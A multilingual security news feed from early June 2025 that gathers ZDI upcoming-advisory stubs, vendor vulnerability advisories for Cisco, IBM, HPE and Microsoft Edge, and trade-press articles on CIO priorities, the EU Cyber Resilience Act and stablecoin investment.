A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27193: NVIDIA
2025-06-05T05:00:00Z | 1749099600

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Nir Ohfeld (@nirohfeld), Shir Tamari (@shirtamari)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26866: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26860: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27147: VIPRE
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Adam Babis' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27195: Redis
2025-06-05T05:00:00Z | 1749099600

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Benny Isaacs, Nir Brakha, Sagi Tzadik (@sagitz_)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26862: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26865: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-325: Hewlett Packard Enterprise Insight Remote Support processAttachmentDataStream Directory Traversal Remote Code Execution Vulnerability
2025-06-05T05:00:00Z | 1749099600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-37099.

http://www.zerodayinitiative.com/advisories/ZDI-25-325/
9 progetti in cima alle priorità dei leader IT di oggi
2025-06-05T05:00:00Z | 1749099600

I CIO di oggi stanno cercando di guidare una nuova ondata di trasformazione armati di intelligenza artificiale, AI generativa e ora anche di agenti AI.“Se dovessi citare i progetti più importanti che i CIO stanno portando avanti oggi, è chiaro che l’agenda è definita da una sola parola: reinvenzione”, osserva Tejas Patel, responsabile della strategia tecnologica e della consulenza per l’APAC per la società di servizi professionali Accenture.Naturalmente, questa trasformazione e questo processo di reinvenzione prevedono molti passaggi che comprendono una combinazione di pilastri IT e obiettivi aziendali, come dimostra l’elenco dei progetti prioritari dei CIO.Di seguito analizziamo le aree strategiche e le iniziative su cui i leader della tecnologia in azienda intendono concentrarsi quest’anno, sulla base dei dati del sondaggio “2025 State of the CIO” condotto da CIO.com [in inglese], di ulteriori risultati di ricerca, dei CIO e di altri leader aziendali. 1. La trasformazione aziendale La trasformazione rimane l’impegno principale per molti CIO, poiché sempre più leader IT abbandonano l’idea dei “progetti hi-tech” e passano, invece, a strategie [in inglese] che utilizzano la tecnologia per reinventare il business.“Per dirla tutta, il termine ‘progetto IT’ sembra anche un po’ obsoleto”, afferma Trevor Schulze, Chief Digital and Information Officer dell’azienda di software Alteryx. “Ciò che stiamo portando avanti sono soprattutto gli sforzi di trasformazione aziendale che avvengono grazie alla tecnologia. Nell’era dell’intelligenza artificiale, i CIO non si possono limitare a fornire soluzioni, ma devono contribuire a scrivere il manuale su come le aziende devono competere e crescere”.I dati del rapporto “2025 State of Digital Transformation” di TEKsystems [in inglese] confermano tali affermazioni, almeno per quanto riguarda le aziende lungimiranti. La ricerca ha rilevato, infatti, che la trasformazione digitale [in inglese] è un pilastro fondamentale per l’85% delle aziende identificate come leader digitali, rispetto al 44% di quelle identificate come “ritardatarie”.La digital transformation è anche al centro dell’attenzione di Dennis Hodges, CIO di Inteva Products [in inglese], fornitore globale di componenti e sistemi ingegnerizzati per il settore automobilistico.“La mia priorità assoluta è la trasformazione digitale in tutta l’azienda, con l’obiettivo di gestire meglio le funzioni operative attraverso sistemi di gestione semplificati e unificati”, afferma. “Ciò include il business maturity modeling, il miglioramento dei processi e l’RPA per potenziare i metodi operativi attuali, la revisione dell’intero portafoglio di applicazioni per migliorare l’integrazione e la funzionalità e l’AI per trasformare l’intera area dei processi”. 2. Creazione di valore I CIO sono anche fortemente concentrati su iniziative che creano valore per le loro imprese, sia attraverso progetti di automazione per aumentare la produttività, sia attraverso iniziative di generazione di ricavi basate sull’intelligenza artificiale, sottolinea Mark Taylor, CEO della Society for Information Management (SIM), un’associazione professionale senza fini di lucro.Il sondaggio 2025 State of the CIO di CIO.com [in inglese] lo sottolinea, osservando che “la spesa tecnologica nel 2025 sarà destinata a iniziative aziendali più strategiche volte alla crescita dei ricavi e alla fidelizzazione dei clienti. La monetizzazione dei dati aziendali [in inglese] è stata la priorità assoluta per il 38% degli intervistati nel 2025, seguita dal miglioramento della customer experience [in inglese] (35%) e dallo sviluppo di nuovi flussi di ricavi digitali [in inglese] (32%)”.La società di ricerca Gartner ha identificato una tendenza simile nel suo rapporto “2025 CIO Leadership Perspective” [in inglese], affermando che “quest’anno i CIO segnalano che l’aumento dei ricavi è una delle loro priorità principali in tutta l’azienda, dimostrando che la tecnologia è un fattore chiave per la crescita dei ricavi”. 3. AI di grande impatto Questa mentalità orientata alla creazione di valore sta anche influenzando le iniziative di intelligenza artificiale che i CIO stanno promuovendo [in inglese], poiché i responsabili IT collaborano con i colleghi del business per identificare le opportunità in cui l’AI “può fare la differenza”.“Quest’anno, una delle nostre priorità principali è scalare l’intelligenza artificiale in tutta l’azienda, non solo in modo frammentario o con progetti pilota, ma in modo da fare la differenza”, dice Schulze di Alteryx, aggiungendo che questo obiettivo sta plasmando il lavoro svolto dal suo team. “Ci stiamo concentrando sulla creazione di una solida piattaforma di servizi di IA per questo scopo. Pipeline di dati governate e di alta qualità, un’infrastruttura adeguata per supportare un’intelligenza artificiale responsabile e modelli linguistici di grandi dimensioni su misura per casi d’uso aziendali reali’. Come molti CIO, Schulze sta passando “dalla sperimentazione dell’IA alla sua reale implementazione”.“Le nostre aree di interesse includono l’automazione delle funzioni di supporto (interne ed esterne), il miglioramento dell’analisi del percorso dei clienti e l’integrazione dell’intelligenza nei sistemi GTM interni”, commenta. “Il motore del business è la velocità: ridurre il tempo che intercorre tra l’intuizione e l’azione”. 4. La sicurezza dell’AI I CIO stanno abbinando progetti di intelligenza artificiale di grande impatto a iniziative che rafforzano sia la sicurezza che la governance delle loro capacità.Schulze, per esempio, lo indica come una delle finalità principali della sua azienda, sottolineando come conosca altri manager con ruoli omologhi al suo che, similmente, li hanno inseriti nella loro lista delle cose da fare.“Sento molti colleghi alle prese con le difficoltà relative allo scalare l’AI in modo sicuro, soprattutto per quanto riguarda la trasparenza dei modelli, la provenienza dei dati e la proliferazione dei fornitori”, precisa Schulze. “Stiamo affrontando la governance dell’intelligenza artificiale nello stesso modo in cui abbiamo affrontato la SOX [Sarbanes-Oxley] [in inglese] ai tempi: non aggiungerla in un secondo momento, ma integrarla fin dall’inizio e renderla parte integrante del funzionamento dell’intera azienda”.Patel di Accenture offre osservazioni simili, spiegando che l’AI introduce nuove modalità di attacco [in inglese], per esempio attraverso possibilità di model poisoning [in inglese], e crea anche nuovi rischi, come le hallucination.I CIO devono quindi intervenire per affrontarli, aggiunge.“L’AI è la nuova frontiera della sicurezza e i Chief Information Officer stanno integrando il rilevamento delle minacce nei modelli e rafforzando i controlli su come la tecnologia viene addestrata, governata e implementata. L’enfasi è sulla protezione del livello di intelligence prima che gli aggressori lo prendano di mira”, afferma.Tuttavia, esistono delle difficoltà. Patel sottolinea che gli strumenti di sicurezza non si sono ancora adattati allo stack dell’AI (modelli, agenti, API) e che manca una governance unificata tra intelligenza artificiale, dati, cloud e sicurezza. 5. La sicurezza aziendale L’attenzione alla governance e alla sicurezza dell’AI si integra con il più ampio lavoro di security aziendale che i CIO conducono ormai da molti anni.I manager tecnologici di tutti i settori e di tutti i livelli di maturità digitale hanno indicato in interviste, sondaggi e rapporti che il rafforzamento della sicurezza della loro impresa continua a essere in cima alle loro agende, oggi come in passato.Per esempio, la ricerca di TEKsystems ha rilevato che il rafforzamento della sicurezza informatica è uno dei 10 obiettivi principali dei leader digitali per il 2025, mentre il sondaggio State of the CIO di CIO.com ha rilevato che il rispetto dei requisiti di conformità è stata la seconda iniziativa aziendale in ordine di importanza citata dai CIO per il 2025, e che l’aumento delle protezioni di sicurezza informatica è stata la seconda iniziativa elencata dai rispondenti delle linee di business (LOB).Nel frattempo, dal rapporto CIO Leadership Perspectives di Gartner [in inglese] emerge che “i CIO hanno citato la sicurezza informatica e la gestione dei rischi come la loro priorità numero uno per il quarto anno consecutivo”.“La sicurezza sarà sempre una priorità”, nota Thomas Phelps IV, CIO di Laserfiche e membro del comitato consultivo del SIM Research Institute.Phelps afferma che l’implementazione di nuove tecnologie di sicurezza, il miglioramento delle valutazioni dei rischi di terze parti [in inglese] e il rafforzamento della garanzia della privacy dei dati sono tra i suoi progetti principali per quest’anno. 6. La customer experience Il miglioramento dell’esperienza del cliente (CX) continua a essere uno dei progetti principali per i CIO di oggi.Sempre secondo State of the CIO, “in considerazione di una rinnovata attenzione per la customer experience, i leader IT stanno promuovendo una serie di tecnologie incentrate su di essa, che includono dati e analisi, nonché AI/ML e automation”.Il lavoro di Phelps sulla CX rispecchia questa osservazione.Per esempio, Laserfiche sta aggiungendo l’automazione al processo di preventivazione per offrire ai clienti una maggiore visibilità sulle transazioni e a quello che riguarda l’evasione degli ordini e all’assistenza clienti. Inoltre, sta utilizzando l’intelligenza artificiale per acquisire una visione a 360 gradi dei clienti e delle loro esigenze, al fine di migliorare la velocità e l’efficacia del programma di assistenza clienti e offrire più opzioni self-service.“I nostri clienti si aspettano sempre di più in termini di assistenza reattiva e di alta qualità, quindi abbiamo una serie di iniziative per aiutare a semplificare le interazioni con la customer care”, spiega Phelps. 7. Le fondamenta IT Sebbene i CIO stiano portando avanti le ultime tecnologie di intelligenza artificiale e automazione, continuano a prestare grande attenzione anche alle funzionalità IT di base.Secondo l’Agenda CIO 2025 [in inglese] di Gartner, “oltre l’80% dei leader tech prevede di investire in funzionalità fondamentali, tra cui: sicurezza informatica, GenAI, business intelligence e analisi dei dati, nonché tecnologie di integrazione come le API”.Il rapporto afferma, inoltre, che “queste tecnologie fondamentali guidano l’innovazione, migliorano l’efficienza operativa e aiutano le imprese a mantenere un vantaggio competitivo in un panorama sempre più digitale”.Taylor di SIM afferma che i CIO stanno, per esempio, aggiornando i sistemi di pianificazione delle risorse aziendali (ERP) [in inglese], perfezionando l’uso del cloud [in inglese] per ottimizzare l’elaborazione riducendo al minimo i costi [in inglese] e abbandonando i sistemi legacy. Altri citano aggiornamenti, come il passaggio da Windows 10 a Windows 11 prima che Microsoft termini il supporto per la versione precedente.I CIO affermano di riconoscere la continua necessità di essere impeccabili nelle fondamenta dell’IT per portare le loro organizzazioni verso il futuro. 8. Modernizzare l’IT Tutto questo lavoro sulle fondamenta non significa che i CIO accettino lo status quo; anzi, sono desiderosi di rinnovare i loro stack tecnologici con funzionalità moderne e ne stanno facendo una parte importante del loro programma di lavoro.Per Joshua Bellendir, vice presidene senior dell’IT e CIO di WHSmith North America, ciò significa “ritirare i vecchi sistemi legacy che ci rallentano, introdurre soluzioni moderne e costruire livelli di dati e sistemi fondamentali. Tutto ciò che facciamo, dalla modernizzazione al cloud-first, supporterà la nostra iniziativa sui dati e ci forniràquelli di cui abbiamo bisogno per l’AI, consentendoci di scalare e far crescere il business”.A detta di Patel di Accenture, la domanda di core IT scalabili e adattabili a livello regionale, le pressioni normative e la sovranità dei dati sono alla base di gran parte degli sforzi di modernizzazione odierni.I CIO stanno passando ad architetture modulari e cloud-first su misura per le esigenze regionali, nonché a una strategia “asset-right” che bilancia il cloud e l’infrastruttura di proprietà, aggiunge.La modernizzazione, tuttavia, non è un compito facile, afferma Patel, poiché le infrastrutture legacy frammentate, la dipendenza da un unico fornitore e la limitata predisposizione al cloud delle applicazioni aziendali core creano sfide significative. 9. Ripensare l’IT per il futuro Bellendir non si sta limitando a modernizzare l’infrastruttura IT di WHSmith North America, ma la sta rendendo a prova di futuro, per esempio passando a microservizi e altri approcci e tecnologie che supporteranno meglio gli obiettivi aziendali, come una migliore CX, nei prossimi anni.“Stiamo gettando le basi per il futuro, in modo da poter fare tutto ciò che vogliamo; questo è fondamentale per la mia strategia attuale”, rileva. “Dal punto di vista dei progetti IT e dei sistemi, il futuro è davvero specifico per la nostra attività, per dove stiamo andando e per ciò che abbiamo in programma di fare”.E poi aggiunge: “Penso che siamo in una buona posizione grazie agli investimenti che abbiamo fatto finora”.Patel concorda sulla necessità di garantire la sostenibilità futura e di “reinventare il modello operativo tecnologico”.“Le strutture IT tradizionali non sono in grado di sostenere il ritmo del cambiamento”, conclude. “Stiamo assistendo a una svolta verso modelli operativi basati sull’intelligenza artificiale: team più snelli, gerarchie appiattite e un approccio alla consegna che integra uomo e macchina. I CIO stanno diventando gli architetti dell’agilità organizzativa”.

https://www.cio.com/article/4001635/9-progetti-in-cima-alle-priorita-dei-leader-it-di-oggi.html
Cyber as a Pressure Valve: Why Economic Conflict Is Fueling a New Era of Cyber Escalation
2025-06-05T05:00:00Z | 1749099600

Behind the tariff headlines, cybersecurity experts are watching for something less visible but just as consequential: a wave of state-sponsored cyber operations.

https://www.securitymagazine.com/articles/101671-cyber-as-a-pressure-valve-why-economic-conflict-is-fueling-a-new-era-of-cyber-escalation
China accuses Taiwan of running five feeble APT gangs, with US help
2025-06-05T04:49:02Z | 1749098942

The authors who claimed America hacked itself to discredit Beijing are back with another report Beijing complains it’s under relentless attack by the equivalent of an ant trying to shake a tree China’s National Computer Virus Emergency Response Center on Thursday published a report in which it claims Taiwan targeted it with a years-long but feeble cyber offensive, backed by the USA.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/china_taiwan_us_apt_report/
Cyber Resilience in Zeiten geopolitischer Unsicherheit
2025-06-05T04:00:00Z | 1749096000

Cyberbedrohungen existieren längst nicht mehr im luftleeren Raum – sie entstehen im Spannungsfeld von Geopolitik, regulatorischer Zersplitterung und einer stetig wachsenden digitalen Angriffsfläche.vectorfusionart – shutterstock.com Cybersecurity ist heute ein rechtliches, operatives und geopolitisches Thema. Für CIOs und CISOs ist die Botschaft eindeutig: Resilienz bedeutet nicht mehr nur, zu reagieren, sondern vorbereitet zu sein. Vorbereitung heißt, Systeme – und Teams – aufzubauen, die sowohl dem Druck von Hackerangriffen als auch neuen regulatorischen Anforderungen standhalten können. Neue digitale Pflichten, alte geopolitische Spannungen In diesem Zusammenhang ist der Cyber Resilience Act (CRA) nicht nur ein weiterer regulatorischer Rahmen, sondern ein strategischer Wendepunkt. Die digitale Bedrohungslage wird zunehmend komplexer: staatlich unterstützte Angriffe, fragmentierte globale Regulierung und grenzüberschreitende IT-Abhängigkeiten treffen auf neue gesetzliche Anforderungen. IT-Sicherheit ist nicht länger nur ein technisches Thema – sie wird zum Bestandteil unternehmerischer Resilienz und Risikosteuerung. Sicherheitsvorgaben werden zum Geschäftsrisiko Mit dem CRA schließt die EU eine langjährige Lücke in ihrer Digitalpolitik: Erstmals gelten verbindliche Cybersicherheitsanforderungen für nahezu alle vernetzten Produkte. Vom vernetzten Haushaltsgerät bis hin zu komplexer Unternehmensinfrastruktur – alles fällt künftig unter einen einheitlichen, verpflichtenden Rahmen. Doch der eigentliche Paradigmenwechsel ist nicht technischer, sondern strategischer Natur: Sicherheit ist kein Feature mehr – sie ist regulatorische Pflicht, Reputationsfaktor und haftungsrelevantes Thema zugleich. Für besonders risikobehaftete Produktkategorien wie SIEM-Systeme, Firewalls oder intelligente Zähler bedeutet das: strenge Tests, lückenlose Dokumentation und kontinuierliches Monitoring – über den gesamten Lebenszyklus hinweg, von der Entwicklung bis zur Außerbetriebnahme. Der CRA verpflichtet Hersteller und Anbieter künftig dazu: Sicherheit ab der Produktentwicklung zu integrieren („Security by Design“); Schwachstellen systematisch zu dokumentieren und zu melden; Sicherheitsupdates über den gesamten Lebenszyklus bereitzustellen; bei Hochrisikoprodukten strengere Prüf- und Berichtspflichten einzuhalten. Die Botschaft ist klar: Sicherheit wird zur Haftungsfrage – und damit zur Managementverantwortung. Compliance als Wettbewerbsvorteil Ja, die Einhaltung des CRA erfordert Investitionen – in Architektur, Teams und Governance-Strukturen. Doch gleichzeitig eröffnet sich eine seltene Chance, die eigene Wettbewerbsposition zu stärken. Ein einheitlicher EU-Rahmen reduziert regulatorische Zersplitterung, verringert Markteintrittsbarrieren und schafft einen klaren Maßstab für Produktsicherheit. Wer frühzeitig handelt, gewinnt mehr als nur Sicherheit – er gewinnt Vertrauen. Besonders in Sektoren, in denen Resilienz ein echtes Differenzierungsmerkmal ist: im Finanzwesen, in der Gesundheitsbranche und der Energiewirtschaft. In einem Markt, der zunehmend durch Lieferkettentransparenz und Käuferskepsis geprägt ist, ist Compliance nicht nur ein Kostenfaktor – sie wird zum strategischen Vermögenswert. Geopolitik wird Teil der IT-Risikoanalyse Digitale Risiken beschränken sich längst nicht mehr auf technische Schwachstellen. Datenhoheit, Exportkontrollen und Lieferkettenabhängigkeiten machen geopolitische Überlegungen zum festen Bestandteil der IT-Strategie. Es reicht nicht mehr zu wissen, wo Daten liegen – entscheidend ist, wie Infrastrukturen auf regulatorische und politische Druckpunkte reagieren. CIOs und CISOs sollten sich unbequeme Fragen stellen – Fragen, die über klassische Risikomodelle hinausgehen: Welche Teile meiner IT-Infrastruktur unterliegen außereuropäischen Rechtsregimen? Wie sind Dritt- und Viertanbieter geografisch und politisch verteilt? Welche regulatorischen Konflikte könnten den Geschäftsbetrieb beeinflussen? Der CRA ist damit auch ein Signal: Resilienz braucht geopolitisches Denken. Hybridlösungen: Architektur gegen Unsicherheit Hybride Architekturen, die lokale Kontrolle mit der Flexibilität der Cloud verbinden, werden in einer Welt zunehmender regulatorischer Komplexität und geopolitischer Zersplitterung immer unverzichtbarer. Wer Daten lokal speichert, wo es erforderlich ist, und gleichzeitig zentrale Kontrolle über Cloud-Komponenten behält, schafft ein resilientes Setup. Die Lebenszyklusanforderungen des CRA – etwa zeitnahe Sicherheitsupdates, Schwachstellenmanagement und Vorfallmeldung – lassen sich deutlich effizienter in modularen, hybriden Systemen umsetzen. Diese ermöglichen ein dynamisches Patching und Transparenz über verschiedene Umgebungen hinweg. Rein lokale oder rein cloudbasierte Systeme stoßen hier zunehmend an ihre Grenzen – entweder beim Datenschutz oder bei der Skalierung. Die Zukunft gehört Systemen, die sich ebenso schnell anpassen, segmentieren und skalieren lassen wie die Gesetze und Bedrohungen, die sie formen. Cyberresilienz ist eine Führungsaufgabe Der Cyber Resilience Act ist mehr als ein politischer Kurswechsel – er ist ein Warnschuss. Sicherheit, Souveränität und Lieferkettenkomplexität konvergieren – und fordern eine neue Rolle für IT-Führungskräfte. Für CIOs und CISOs ist das ein Aufruf zur Führung – nicht bloß zur Einhaltung. Das bedeutet: Sicherheit über den gesamten Produktlebenszyklus hinweg mitdenken, Architekturen entwickeln, die sich regulatorischem Druck flexibel anpassen, und eine enge Zusammenarbeit mit den Rechts- und Risikoteams etablieren. Wer früh handelt, vermeidet nicht nur Strafen – sondern baut Vertrauen auf, sichert sich Marktzugang und gestaltet den neuen Standard digitaler Betriebsmodelle aktiv mit. In einer Zeit, in der Resilienz zum entscheidenden Unterscheidungsmerkmal wird, beginnt Führung jetzt. (jm) Lesetipp: Klöckner-CISO: „In der Security geht es vor allem um Resilienz“

https://www.csoonline.com/article/4000782/cyber-resilience-in-zeiten-geopolitischer-unsicherheit.html
Security Alert (A25-06-04): Multiple Vulnerabilities in Cisco Products
2025-06-05T04:00:00Z | 1749096000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
IBM Cloud login breaks for second time this week and Big Blue isn't saying why
2025-06-05T02:32:09Z | 1749090729

To make matters worse, IBM's security software has a critical vuln caused by an exposed password IBM isn’t having its best week after the company experienced another cloudy outage and a critical-rated vulnerability.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/ibm_cloud_outage_critical_vulnerability/
“2025년 스테이블코인 투자 2024년 대비 10배 예상”···CB인사이츠, ‘스테이블코인 시장 지도’ 공개
2025-06-05T02:28:10Z | 1749090490

CB인사이츠(CBInsights)가 스테이블코인(Stablecon)과 협력해 ‘스테이블코인 시장 지도(stablecoin market map)’을 5월 29일 발표했다. 스테이블코인의 핵심 인프라, 소비자 금융 서비스, 기업 솔루션 등 스테이블코인 생태계 안에서 빠르게 성장하는 시장과 기업을 파악할 수 있는 자료다. 2024년 10억 달러에 달했던 스테이블코인 기업에 대한 투자 규모가 2025년에는 123억 달러로 크게 증가할 전망이다. 주류 금융 기관의 시장 진입, 거래를 넘어선 사용 사례의 확대, 전 세계적으로 증가하는 규제 명확성 제고가 시장에 대한 관심과 성장을 이끌 것이라는 것이 CB인사이츠의 분석이다. 이번에 발표한 스테이블코인 시장 지도는 600개 이상의 스테이블코인 관련 스타트업을 분석한 후, 최근 투자 유치를 통해 성장 잠재력을 가진 것으로 평가되는 172개 기업을 선정했다. CB인사이츠가 스타트업을 평가할 때 사용하는 모자익(Mosaic) 점수를 통해 선정하고, 주요 사업 분야에 따라 8개 범주로 분류했다. CB인사이츠는 “기존의 암호화폐와 달리 기초 자산과의 연계를 통해 안정적인 가치를 유지하는 스테이블코인은 암호화폐의 도입의 주요 장애물인 변동성을 해결하고 있다”고 밝혔다. 이러한 안정성이 기존 금융권의 주요 업체들을 스테이블코인 생태계 안으로 끌어들이면서, 암호화폐 기반 뱅킹(Banking) 기반을 마련하고 있는 것이다. 스테이블코인이 수동적인 가치 저장소가 아닌 고성장 금융 상품으로 전환되면서, 스테이블코인이 위험성이 높은 암호화폐보다 안전한 대안이라는 기존 역할을 넘어 수익 창출 도구 및 유동성 상품으로 진화하는 것도 변화의 배경이다. 스테이블코인을 포함하는 유동성 수익률 부문은 지난 12개월 동안 40건의 거래에서 23억 달러의 자금을 유치한 것으로 나타났다. 국제 결제에서 스테이블코인이 핵심 활용 분야로 두각을 드러내고 있는 점도 눈여겨볼 부분이다. 스테이블코인은 지역에 따라 법정화폐의 특화된 대안 또는 미국 달러의 대체제 역할을 하면서, 결제 처리 업계의 모든 기업이 국가 간 결제 인프라를 지원하고 있다. 이러한 장점 때문에 미국 이외의 지역에서 스테이블코인의 사용 사례가 증가하고 있으며, 글로벌 투자 패턴에도 변화를 일으키고 있다. 스테이블코인 시장 지도에 포함된 기업들 중에서 미국 이외의 지역에 본사를 둔 기업들이 지난 1년 동안 전체 거래의 절반 이상을 차지한 것으로 조사됐다.dl-ciokorea@foundryco.com

https://www.cio.com/article/4002154/2025%eb%85%84-%ec%8a%a4%ed%85%8c%ec%9d%b4%eb%b8%94%ec%bd%94%ec%9d%b8-%ed%88%ac%ec%9e%90-2024%eb%85%84-%eb%8c%80%eb%b9%84-10%eb%b0%b0-%ec%98%88%ec%83%81%c2%b7%c2%b7%c2%b7cb%ec%9d%b8.html
Cisco Identity Services Engine on Cloud Platforms Static Credential Vulnerability
2025-06-05T02:00:05Z | 1749088805

Classification: Critical, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.9, CVEs: CVE-2025-20286, Summary: A critical vulnerability has been identified in the Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE). The vulnerability could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. This vulnerability exists because credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, resulting in different Cisco ISE deployments sharing the same credentials. These credentials are shared across multiple Cisco ISE deployments as long as the software release and cloud platform are the same. An attacker could exploit this vulnerability by extracting the user credentials from Cisco ISE that is deployed in the cloud and then using them to access Cisco ISE that is deployed in other cloud environments through unsecured ports. The vulnerability affects instances of Cisco ISE with default configurations with versions 3.1, 3.2, 3.3 and 3.4 for AWS and 3.2, 3.3 and 3.4 for Azure and OCI.

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7
Vulnerabilities Fixed in IBM QRadar Suite Software Components
2025-06-05T02:00:04Z | 1749088804

Classification: Severe, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.6, CVEs: CVE-2025-25019, CVE-2025-25022, CVE-2025-25021, CVE-2025-1334, CVE-2025-25020, Summary: Multiple different vulnerabilities have been identified and fixed in IBM QRadar. The most severe vulnerability is rated critical and allows an unauthenticated user to obtain highly sensitive information from configuration files. The vulnerabilities affect BM Cloud Pak for Security versions 1.10.0.0 - 1.10.11.0 and QRadar Suite Software 1.10.12.0 - 1.11.2.0.

https://www.ibm.com/support/pages/node/7235432
Multiple Vulnerabilities in HPE StoreOnce Software
2025-06-05T02:00:03Z | 1749088803

Classification: Critical, Solution: Official Fix, Exploit Maturity: Not Defined, CVSSv3.1: 9.8, CVEs: CVE-2025-37089, CVE-2025-37090, CVE-2025-37091, CVE-2025-37092, CVE-2025-37093, CVE-2025-37094, CVE-2025-37095, CVE-2025-37096, Summary: Multiple security vulnerabilities have been identified and fixed in HPE StoreOnce. The vulnerabilities could allow an attacker remote code execution, disclosure of information, server-side request forgery, authentication bypass, arbitrary file deletion, and directory traversal information disclosure vulnerabilities. The most severe vulnerability identified is rated critical. The vulnerabilities affect HPE StoreOnce VSA prior to version v4.3.11.

https://support.hpe.com/hpesc/public/docDisplay
Microsoft Edge Multiple Vulnerabilities
2025-06-05T01:00:00Z | 1749085200

Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: CVE-2025-5419 is being exploited in the wild. A remote... Impact Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Microsoft Edge version prior to 137.0.3296.62 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to version 137.0.3296.62 or later

https://www.hkcert.org/security-bulletin/microsoft-edge-multiple-vulnerabilities_20250605
FTC chair implores Congress to strengthen children’s online privacy protection law
2025-06-05T00:47:54Z | 1749084474

The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.

https://therecord.media/ftc-chair-implores-congress-to-strengthen-childrens-privacy-law
“제조 업계, 스마트 기술 전환 중··· 95%가 AI 투자 예정” 로크웰 오토메이션
2025-06-05T00:23:52Z | 1749083032

